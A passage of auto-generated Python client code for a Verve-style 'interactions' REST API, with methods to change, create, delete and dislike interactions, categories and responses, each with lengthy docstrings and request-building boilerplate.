1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteraction If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.change_interaction_category_with_http_info(interaction_id, category_id, requester_id, client_token, **kwargs) else: (data) = self.change_interaction_category_with_http_info(interaction_id, category_id, requester_id, client_token, **kwargs) return data def change_interaction_category_with_http_info(self, interaction_id, category_id, requester_id, client_token, **kwargs): """ Change interaction category Allows the user to change the interaction category. This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.change_interaction_category_with_http_info(interaction_id, category_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param int category_id: New interaction categoryId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteraction If the method is called asynchronously, returns the request thread. """ all_params = ['interaction_id', 'category_id', 'requester_id', 'client_token', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method change_interaction_category" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'interaction_id' is set if ('interaction_id' not in params) or (params['interaction_id'] is None): raise ValueError("Missing the required parameter `interaction_id` when calling `change_interaction_category`") # verify the required parameter 'category_id' is set if ('category_id' not in params) or (params['category_id'] is None): raise ValueError("Missing the required parameter `category_id` when calling `change_interaction_category`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `change_interaction_category`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `change_interaction_category`") resource_path = '/interactions/{interactionId}/{categoryId}'.replace('{format}', 'json') path_params = {} if 'interaction_id' in params: path_params['interactionId'] = params['interaction_id'] if 'category_id' in params: path_params['categoryId'] = params['category_id'] query_params = {} header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} if 'fields' in params: form_params.append(('fields', params['fields'])) body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/x-www-form-urlencoded']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'PUT', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteraction', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def change_interaction_type(self, interaction_id, interaction_type, requester_id, client_token, **kwargs): """ Change interaction type Allows the user to change the interaction type. Boolean value This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.change_interaction_type(interaction_id, interaction_type, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param str interaction_type: New interaction type (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteraction If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.change_interaction_type_with_http_info(interaction_id, interaction_type, requester_id, client_token, **kwargs) else: (data) = self.change_interaction_type_with_http_info(interaction_id, interaction_type, requester_id, client_token, **kwargs) return data def change_interaction_type_with_http_info(self, interaction_id, interaction_type, requester_id, client_token, **kwargs): """ Change interaction type Allows the user to change the interaction type. Boolean value This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.change_interaction_type_with_http_info(interaction_id, interaction_type, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param str interaction_type: New interaction type (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteraction If the method is called asynchronously, returns the request thread. """ all_params = ['interaction_id', 'interaction_type', 'requester_id', 'client_token', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method change_interaction_type" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'interaction_id' is set if ('interaction_id' not in params) or (params['interaction_id'] is None): raise ValueError("Missing the required parameter `interaction_id` when calling `change_interaction_type`") # verify the required parameter 'interaction_type' is set if ('interaction_type' not in params) or (params['interaction_type'] is None): raise ValueError("Missing the required parameter `interaction_type` when calling `change_interaction_type`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `change_interaction_type`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `change_interaction_type`") resource_path = '/interactions/{interactionId}/type'.replace('{format}', 'json') path_params = {} if 'interaction_id' in params: path_params['interactionId'] = params['interaction_id'] query_params = {} header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} if 'interaction_type' in params: form_params.append(('interactionType', params['interaction_type'])) if 'fields' in params: form_params.append(('fields', params['fields'])) body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/x-www-form-urlencoded']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'PUT', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteraction', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def create_interaction_category(self, requester_id, client_token, **kwargs): """ Create interaction category This service allows a user to create a category. The following fields(key:value) are required to be present in the Category JSON object. Refer to the Model & Model Schema of the expected JSON Object for the body of this API. **Required fields** 1. associationId 2. categoryName 3. interactionType This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.create_interaction_category(requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param InteractionCategory body: :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionCategory If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.create_interaction_category_with_http_info(requester_id, client_token, **kwargs) else: (data) = self.create_interaction_category_with_http_info(requester_id, client_token, **kwargs) return data def create_interaction_category_with_http_info(self, requester_id, client_token, **kwargs): """ Create interaction category This service allows a user to create a category. The following fields(key:value) are required to be present in the Category JSON object. Refer to the Model & Model Schema of the expected JSON Object for the body of this API. **Required fields** 1. associationId 2. categoryName 3. interactionType This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.create_interaction_category_with_http_info(requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param InteractionCategory body: :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionCategory If the method is called asynchronously, returns the request thread. """ all_params = ['requester_id', 'client_token', 'body', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method create_interaction_category" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `create_interaction_category`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `create_interaction_category`") resource_path = '/interactions/categories'.replace('{format}', 'json') path_params = {} query_params = {} header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} body_params = None if 'body' in params: body_params = params['body'] # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/x-www-form-urlencoded', 'application/json']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteractionCategory', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def delete_interaction(self, interaction_id, requester_id, client_token, **kwargs): """ Delete interaction Allows the user to delete a interaction. Returns the deleted response This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.delete_interaction(interaction_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteraction If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.delete_interaction_with_http_info(interaction_id, requester_id, client_token, **kwargs) else: (data) = self.delete_interaction_with_http_info(interaction_id, requester_id, client_token, **kwargs) return data def delete_interaction_with_http_info(self, interaction_id, requester_id, client_token, **kwargs): """ Delete interaction Allows the user to delete a interaction. Returns the deleted response This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.delete_interaction_with_http_info(interaction_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteraction If the method is called asynchronously, returns the request thread. """ all_params = ['interaction_id', 'requester_id', 'client_token', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method delete_interaction" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'interaction_id' is set if ('interaction_id' not in params) or (params['interaction_id'] is None): raise ValueError("Missing the required parameter `interaction_id` when calling `delete_interaction`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `delete_interaction`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `delete_interaction`") resource_path = '/interactions/{interactionId}'.replace('{format}', 'json') path_params = {} if 'interaction_id' in params: path_params['interactionId'] = params['interaction_id'] query_params = {} header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} if 'fields' in params: form_params.append(('fields', params['fields'])) body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/x-www-form-urlencoded']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'DELETE', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteraction', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def delete_interaction_category(self, category_id, requester_id, client_token, **kwargs): """ Delete interaction category Allows the user to delete the interaction category. Returns the deleted interaction category This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.delete_interaction_category(category_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int category_id: categoryId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)categoryId 2)categoryName 3)interactionType **A) Available values -** 1)categoryId 2)categoryName 3)categoryDescription 4)createdDate 5)isSubscribed 6)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionCategory If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.delete_interaction_category_with_http_info(category_id, requester_id, client_token, **kwargs) else: (data) = self.delete_interaction_category_with_http_info(category_id, requester_id, client_token, **kwargs) return data def delete_interaction_category_with_http_info(self, category_id, requester_id, client_token, **kwargs): """ Delete interaction category Allows the user to delete the interaction category. Returns the deleted interaction category This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.delete_interaction_category_with_http_info(category_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int category_id: categoryId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)categoryId 2)categoryName 3)interactionType **A) Available values -** 1)categoryId 2)categoryName 3)categoryDescription 4)createdDate 5)isSubscribed 6)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionCategory If the method is called asynchronously, returns the request thread. """ all_params = ['category_id', 'requester_id', 'client_token', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method delete_interaction_category" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'category_id' is set if ('category_id' not in params) or (params['category_id'] is None): raise ValueError("Missing the required parameter `category_id` when calling `delete_interaction_category`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `delete_interaction_category`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `delete_interaction_category`") resource_path = '/interactions/categories/{categoryId}'.replace('{format}', 'json') path_params = {} if 'category_id' in params: path_params['categoryId'] = params['category_id'] query_params = {} header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} if 'fields' in params: form_params.append(('fields', params['fields'])) body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/x-www-form-urlencoded']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'DELETE', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteractionCategory', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def delete_response(self, response_id, requester_id, client_token, **kwargs): """ Delete response Allows the user to delete an response. Returns the deleted response This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.delete_response(response_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int response_id: responseId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionType **A) Available values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionId 5)respondingUser 6)isMarkedResponse 7)noOfLikes 8)noOfDislikes 9)replyCount 10)isLiked 11)isDisliked 12)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionResponse If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.delete_response_with_http_info(response_id, requester_id, client_token, **kwargs) else: (data) = self.delete_response_with_http_info(response_id, requester_id, client_token, **kwargs) return data def delete_response_with_http_info(self, response_id, requester_id, client_token, **kwargs): """ Delete response Allows the user to delete an response. Returns the deleted response This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.delete_response_with_http_info(response_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int response_id: responseId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionType **A) Available values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionId 5)respondingUser 6)isMarkedResponse 7)noOfLikes 8)noOfDislikes 9)replyCount 10)isLiked 11)isDisliked 12)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionResponse If the method is called asynchronously, returns the request thread. """ all_params = ['response_id', 'requester_id', 'client_token', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method delete_response" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'response_id' is set if ('response_id' not in params) or (params['response_id'] is None): raise ValueError("Missing the required parameter `response_id` when calling `delete_response`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `delete_response`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `delete_response`") resource_path = '/interactions/responses/{responseId}'.replace('{format}', 'json') path_params = {} if 'response_id' in params: path_params['responseId'] = params['response_id'] query_params = {} header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} if 'fields' in params: form_params.append(('fields', params['fields'])) body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/x-www-form-urlencoded']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'DELETE', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteractionResponse', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def dislike_response(self, interaction_id, response_id, requester_id, client_token, **kwargs): """ Dislike response Allows the user to dislike the response. This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.dislike_response(interaction_id, response_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param int response_id: responseId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionType **A) Available values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionId 5)respondingUser 6)isMarkedResponse 7)noOfLikes 8)noOfDislikes 9)replyCount 10)isLiked 11)isDisliked 12)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionResponse If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.dislike_response_with_http_info(interaction_id, response_id, requester_id, client_token, **kwargs) else: (data) = self.dislike_response_with_http_info(interaction_id, response_id, requester_id, client_token, **kwargs) return data def dislike_response_with_http_info(self, interaction_id, response_id, requester_id, client_token, **kwargs): """ Dislike response Allows the user to dislike the response. This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.dislike_response_with_http_info(interaction_id, response_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param int response_id: responseId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionType **A) Available values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionId 5)respondingUser 6)isMarkedResponse 7)noOfLikes 8)noOfDislikes 9)replyCount 10)isLiked 11)isDisliked 12)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionResponse If the method is called asynchronously, returns the request thread. """ all_params = ['interaction_id', 'response_id', 'requester_id', 'client_token', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method dislike_response" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'interaction_id' is set if ('interaction_id' not in params) or (params['interaction_id'] is None): raise ValueError("Missing the required parameter `interaction_id` when calling `dislike_response`") # verify the required parameter 'response_id' is set if ('response_id' not in params) or (params['response_id'] is None): raise ValueError("Missing the required parameter `response_id` when calling `dislike_response`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `dislike_response`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `dislike_response`") resource_path = '/interactions/{interactionId}/responses/{responseId}/dislike'.replace('{format}', 'json') path_params = {} if 'interaction_id' in params: path_params['interactionId'] = params['interaction_id'] if 'response_id' in params: path_params['responseId'] = params['response_id'] query_params = {} header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} if 'fields' in params: form_params.append(('fields', params['fields'])) body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/x-www-form-urlencoded']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteractionResponse', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def get_friends_interactions(self, interaction_status, start, end, requester_id, client_token, **kwargs): """ Get list of interactions shared by friends Returns the list of interactions shared by friends This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_friends_interactions(interaction_status, start, end, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str interaction_status: /* Interaction status 1) ALL 2) UNREPLIED 3) REPLIED 4) CLOSED */ (required) :param int start: start, initial value start from 0 (required) :param int end: end (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str interaction_type: Interaction Type :param int category_id: categoryId :param str association: association :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionList If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.get_friends_interactions_with_http_info(interaction_status, start, end, requester_id, client_token, **kwargs) else: (data) = self.get_friends_interactions_with_http_info(interaction_status, start, end, requester_id, client_token, **kwargs) return data def get_friends_interactions_with_http_info(self, interaction_status, start, end, requester_id, client_token, **kwargs): """ Get list of interactions shared by friends Returns the list of interactions shared by friends This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_friends_interactions_with_http_info(interaction_status, start, end, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str interaction_status: /* Interaction status 1) ALL 2) UNREPLIED 3) REPLIED 4) CLOSED */ (required) :param int start: start, initial value start from 0 (required) :param int end: end (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str interaction_type: Interaction Type :param int category_id: categoryId :param str association: association :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionList If the method is called asynchronously, returns the request thread. """ all_params = ['interaction_status', 'start', 'end', 'requester_id', 'client_token', 'interaction_type', 'category_id', 'association', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() 